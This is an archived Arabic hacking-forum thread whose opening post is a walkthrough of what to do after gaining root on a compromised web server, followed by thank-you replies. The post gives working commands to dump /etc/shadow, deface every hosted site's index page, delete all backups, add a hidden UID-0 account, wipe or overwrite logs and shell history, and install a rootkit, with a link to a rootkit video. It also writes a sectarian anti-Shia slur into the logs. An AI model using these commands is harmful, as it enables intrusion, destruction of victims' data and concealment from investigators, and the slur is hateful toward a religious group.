:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   مآ بعد الرووت .... (http://www.vbspiders.com/vb/t31985.html)

Q2-FOX2R 07-08-2010 09:42 PM

مآ بعد الرووت ....
 
بسم الله الرحمن الرحيم

طبعاااول شي نحتاج للاداه الي اسمها البيوتي عشان نتصل بالسيرفر وهي متوفرة في النت يعني
ما عليك غير انك تكتب في قوقل ===> putty

طبعاا لنفرض انك عملت اتصال ونجحت بالاتصال بالسيرفر وش تسوي؟ تعال اشرح لك اهم الاوامر:

cat /etc/shadow الامر اسمه استعراض ملف الشدو والهدف منه اضهار جميع باسووردات النظام

cat /etc/httpd/conf/httpd.conf | grep ServerName هذا الامر الجميل يستعرض لك المواقع الي على السيرفر

echo "حط الكلام الي تبي هنا">/home/*/public_html/index.htmlالامر هذا لتغيير الاندكس وكتابة اي شي تريد


طيب كذا تكون انت بس غيرت الاندكسات نبي نسوي فيه حركة نذاله ونحذف الباك اب اليومي والاسبوعي وشهريوانت في الشل اكتب

cd /backup/cpbackup

واكتب

ls -la

راح يطلع لك مجلدات الباك اب اليومي والاسبوعي وشهري بهذا الاسم

daily
weekly
monthly

اذا ماطلعت لك بتكون على هذا المسار

cd /backup

الان علشان نحذف مجلدات الباك اب نكتب

rm -rf daily لحذف الباك اب اليومي
rm -rf weekly لحذف الباك اب الاسبوعي
rm -rf monthly لحذف الباك اب الشهري

بعض الصحاب السيرفرات يغير اسم مجلد الباك اب او يسوي مجلد في مسار ثاني

هذا امر البحث عن المجلدات الي تحمل هذا الاسم backup وحذفها


find / -name "cpbackup*" -exec rm {} ; الامر لحذف ملفات الباك اب بالسيرفر

find / -name "backup*" -exec rm {} ; وهذا كذلك

اما لو حاب تاخذ باك اب لسيرفر كامل ونقله لسيرفر اخر اول خطوه تاخذ باك اب لجميع الموقع وتنقلهم لمجلد وتضغط المجلد

وتدخل على المسار الموجود فيه الباك اب وتنفذ الامر التالي

scp Backup.tar.gz root@127.0.0.1:/backup/cpbackup


نغير الاي بي الى اي بي السيرفر الجديد واضغط انتر راح يطلب الباسبورد بعدها راح يبدا ينقل الباك اب وفيه طريقه ثانيه من خلال لوحة السيرفر لو فكيت بااااسبورد الروت

/usr/sbin/useradd -o -u 0 -g 0 Q2-FOX2R -p 123456789هذا الامر لانشاء روت يحمل الاسم Q2-FOX2R والباسوورد 123456789

/var/log لمشاهدت ملف اللوق(الدخول للسيرفر)

/root/.bash_history وهذا كذلك

echo "fuck shia">lastlog
هذا الامر لتغيير الاي بي مالك الى كلمة fuck shia

echo "fuck shia">wtmpونكرر العملية هنا ايضاا

cat /root/.bash_history الامر هذا لمشاهدت جميع العمليات بالسيرفر

echo "fuck shia">.bash_history

مسحناها وخلينا يطلع له fuck shia

وبالنهاية قبل لاتطلع طبق هالاوامر واحد ورا الثاني:

هذا امر بحث عن الملفات الي يكون فيها log وتكون ويتخزن فيها اي بيك ويحذفها

كود PHP:

find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \; 


وهم مسح العمليات ومسح اللوق



احيان وانت شغال في السيرفر يفصل او يعلق ويحتاج تعمل له رستارت

لعمل رستارت للسيرفر كامل : reboot
لعمل ريستارت لقواعد البيانات: /etc/init.d/mysql restart
لعمل ريستارت لسي بنل /etc/rc.d/init.d/cpanel restart

و اهم شئ نسته ههه
تركيب SSH-Key لضمان الرجوع للسيرفر .... الطريقة و الله حلوة أخليها ليوم ثاني بادن الله
و تركيب روت كيت على السيرفر طبعا لضمان الرجوع للسيرفر

و عشانكم عملت شرح للتكريب الروت كت من الاول لالاآخر
لتحميل الشرح فيديو

http://www.multiupload.com/9ZS98J3M06

باسوورد فك الضغط
Q2-FOX2R
و اتمنى اي واحد عندو طرق ثانية يشاركنا بيها
في النقاش افادة
و ما تنسو التقييم هههههههههههه
وفي النهاية تقبلوا تحياتي وارجو ان تعذروني اذا كان فيه تقصير

وان شاء الله لي اضافات على الموضوع

:yes::yes:n028

NeTCaT-Ma 07-08-2010 10:05 PM

مشكووور أخي على المجهوووود تحيتي لك

Q2-FOX2R 07-08-2010 10:12 PM

عآدي حبيبي

مجهود بسيط من منتدى قدم لي الكثير

انشا الله للأمام .....
لللاقي بالمنتدى العزيز

smilies7smilies7

KaLa$nikoV 07-09-2010 12:19 AM

بارك الله فيك

لي رجعه باذن الله واتطلاع كامل على الموضوع

Dr.NaNo 07-09-2010 12:37 AM

تسلم يابطل واصل تميزك

تحياتي لك .

Q2-FOX2R 07-09-2010 12:24 PM

مشكوورين حبايبي على الرد الأكثر من رائع
تسلموو


الساعة الآن 07:22 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0